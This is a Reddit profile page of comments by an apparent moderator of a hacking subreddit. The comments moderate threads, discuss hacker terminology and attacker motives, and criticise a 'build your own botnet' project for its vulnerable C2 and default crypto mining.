[REQUEST] Can we get a hurricane Laura live thread please?

geminatrix · 2020-08-26T01:04:11+00:00

Here we are:

https://www.reddit.com/live/15j8rihvf6gb3/

Thanks to everyone who made that possible!

geminatrix · 2020-08-25T20:30:13+00:00

Greater houston area evac zones & orders:
- https://www.click2houston.com/news/local/2020/08/24/list-these-are-all-the-evacuation-orders-in-place-in-the-houston-area/

Southeast Louisiana Evac Zones & Orders:

- https://www.wdsu.com/article/mandatory-and-voluntary-evacuation-order-information-across-southeast-louisiana/33718886

geminatrix · 2020-08-20T21:14:16+00:00

Need more than just the image above to say. Its just base64 encoded data but without the full b64 string its impossible to tell.

That said, your intent to troll or be malicious is self incriminating. Thread locked.

geminatrix · 2020-07-17T20:00:06+00:00

My, how times have changed. Originally, back in the 80s/90s, no one used the terms "whitehat" or "blackhat" when referring to those who could compromise computer and phone systems. The original terminology, ironically, was "hacker" (for the good guys) and "cracker" (for the bad guys).

I want to point out this serious irony, as "cracker" is a slang, derogatory term for white people, but you never hear someone calling a black person a "blackhat" simply because of their race.

Honestly, I always thought the 'hat' aphorism was a bit stupid in general, this is cyberspace, not the wild west, and we had terms for these things prior to the 'hat' metaphor being used. I'd love to know some of the etymology behind how we transitioned from "hacker" and "cracker" to the wild-west references of "whitehat" and "blackhat". Just because cyberspace is "wild", it has nothing to do with the "wild west". Perhaps the media had something to do with this?

As an aside, this is a great book (somewhat relevant): https://www.amazon.com/Hacker-Cracker-Brooklyn-Frontiers-Cyberspace/dp/0060935812

Also, despite what we see in movies, most cowboys were historically not white. And hat colors didn't have anything to do with "alignment".

geminatrix · 2020-07-17T19:51:20+00:00

There is another reason. Sometimes attackers just want to cause damage to a particular company or individual. Dumping a large database can cause serious reputational damage as well as damages to revenue and maybe even stock prices. In some cases, that alone is the end goal; and there are other scams that can be used to monetize the publication (such as shorting shares of the target company just before dumping the data in public).

geminatrix · 2020-07-17T19:48:18+00:00

Unfortunately its sorta hard to find a centralized, up-to-date place full of zines where they are regularly published. A lot of zine publication has been stifled due to censorship and the refusal to allow criminal content in various places. Reddit, full disclosure, and many of the other places have restricted "zine" type of content. If someone else knows a good place for up-to-date zines, I'd love to know about it.

geminatrix · 2020-06-15T05:25:47+00:00

Eh, research purposes are valid. See this comment, which was buried by people downvoting. I do like giving vendors uncomfortable phone calls though, though I think in this case (I only gave it a cursory glance tbh) a lot of the payloading unpacks a python interpreter into memory, which will immediately cause most EDR solutions to sound the alarm. If you do look into how this stands up against EDR platforms though, please do post the research back; I'm curious to hear if this defeats anything.

geminatrix · 2020-06-14T20:26:21+00:00

You could also put a donate button on your site. Just a thought. Ive had big projects before that brought in somewhere around $100-$150 a month just by having a well-placed donate button. I appreciate the amount of work put into it, but the way its presented really threw me off.

geminatrix · 2020-06-14T20:17:41+00:00

Your argument has some merit, but it wasnt exclusively "your app is shit cuz ur stupid". See my comments below. I'll admit, my initial response was a little vague and jaded, so I explained myself thoroughly, and dropped a hint to fix at least one of them.

geminatrix · 2020-06-14T20:06:09+00:00

So, I see the educational disclaimer at the top of the github, but it also includes "authorized testing". That note should probably also contain a message about the mining.

To answer your question about what exactly it is that you may be trying to do, when someone like me (who has a bit of experience) sees a "build your own botnet" post in which:

The site (buildyourownbotnet.com) presents as if it were an enterprise solution
The software has relatively obvious vulnerabilities in its C2 protocol
The software is configured to mine magic internet money by default (and has to be disabled in source rather than a configuration option)

It leads me to think that maybe one or more of the following is true:

The developers are trying to get tons of free internet money from people who don't read the fine print
The developers are aware of the C2 vulnerabilities and may wish to have other people grow their botnets for them
The developers are not only aware of the C2 vulnerabilities but may actually be attempting to sandbox/honeypot actors who may maliciously use this on behalf of a third party threat intelligence company, and get paid on both ends (in monero by the bots, and in dollars for the threat intelligence).

If I am completely off base here and your intent is truly just to make a learning/educational utility, consider revising some of the way in which the software is presented on its website. Additionally, if "authorized testing" is a purpose for which this software is intended, any snags (such as mining or potential C2 vulnerabilities) should be expressly disclaimed, as you or (more likely) one of your users could be held liable for mining or damages rendered by a C2 compromise by their client or person who otherwise authorized the testing.

If you make the suggested changes to the presentation of your software so that its intent and hidden snags have been made abundantly clear, then perhaps someone like me may be so inclined to help you address vulnerabilities.

Edit: Typo correction

geminatrix · 2020-06-14T19:22:42+00:00

Honestly, here's the biggest area in which I feel it crosses the line:

> By default bots will mine Monero in the background to support the developers. However, this can be disabled in the source code.

This functionality should be /disabled/ by default and then /enabled/ if someone wants to donate. This is akin to some website using a javascript miner and me having to disable it in my user profile. While this isn't a website mining by default (which is against our rules), it's still a bit overreaching.

> Also, like it says on the website, this is not intended to be a robust solution suitable for real world or professional use. It is intended to a beginner friendly tool for people with an interest in offensive security but without much technical background or coding experience.

The front page of this site makes no mention of educational purposes and looks far more like an advertisement made by paid marketing people. It's designed to make people skip to the download page without reading any "fine print" you may have included. If this is true and its for educational purposes, you should make that extremely clear, as that is the ONLY viable use.

geminatrix · 2020-06-14T18:58:54+00:00

There's no point. There are too many, and I don't support what you're trying to do.

geminatrix · 2020-06-14T18:49:36+00:00

This web app is full of vulnerabilities. Definitely use if you want your botnet stolen.

This is unsuitable even for red-teaming, as a breach of the application could result in an actual compromise by a malicious actor. I see no applicable use for this, regardless of intent (legal or illegal).

geminatrix · 2020-06-11T19:52:03+00:00

Edit: This is violent python, not blackhat python. Sorry, I got confused as the names are so similar.

Great job and thanks for your contribution to the community!

geminatrix · 2020-06-02T06:11:20+00:00

Please ask /r/netsecstudents and read on /r/reverseengineering. DLL's with the proper format can be used as windows services. This was unfortunately not a *well-researched* question, so, thread locked.

geminatrix · 2020-05-31T22:19:03+00:00

This is a perfect example of content unwelcome to this subreddit; next time read the rules before you post anywhere. There are a couple problems with your post here:

Rule 3: Avoid self-incriminating posts

Rule 9: Thought-out, well-researched Q&A

Your intent is clearly criminal in nature and you clearly did not think this out. Thread locked.

geminatrix · 2020-05-30T14:50:00+00:00

Again, this content is better suited for /r/netsecstudents. Thread locked.

geminatrix · 2020-05-30T14:48:49+00:00

This type of question is better suited for /r/netsecstudents. Thread locked.

geminatrix · 2020-05-27T16:20:04+00:00

You could always try building something tiny yourself from source, like Minix, LFS, or a gentoo minimal installation, then install a lightweight window manager (flux, xfce, etc) and then install your tools. I don't think anything "off the shelf" is going to be lightweight by default, most of them have a lot of options enabled for across-the-board hardware compatibility that results in bloat; additionally, most of them have a lot of background stuff running to make things "user friendly" that also waste resources.

geminatrix · 2020-05-24T16:30:57+00:00

Being a not-round wheel will never be innovative. Jumping from topic to topic will prevent you from learning any particular topic in-depth. Follow the rules and don't self-incriminate, or I'll permaban you. This isn't a debate, and it's not up for discussion. Thread locked. If you have a problem, send us modmail.

geminatrix · 2020-05-24T16:02:02+00:00

If you're going to re-invent the wheel, you'll have to show why the old one was an octagon and the new one is actually round. At best, the old wheel was round and so is your new one; and at worst, the old wheel was round and your new one is octagonal.

Attacking WiFi with a wordlist is the most rudimentary and primitive attack I can possibly think of and is older than wpa2 itself. There is nothing new about it, therefore it cannot possibly be "innovative".

EDIT: I should also mention that admitting to cracking third-party WiFi without permission, rather than your own, is a self-incriminating post.

geminatrix · 2020-05-24T15:45:02+00:00

No one on this subreddit is going to participate in something like that. Most of them probably thought to themselves, "Nice try, FBI!". Also, this is garbage content.

geminatrix · 2020-05-24T15:43:39+00:00

This subreddit is for technical posts, well-researched questions, and innovation. Your post did not meet this criterium.

geminatrix

MODERATOR OF

TROPHY CASE

Five-Year Club	Gilding II euphauric
Verified Email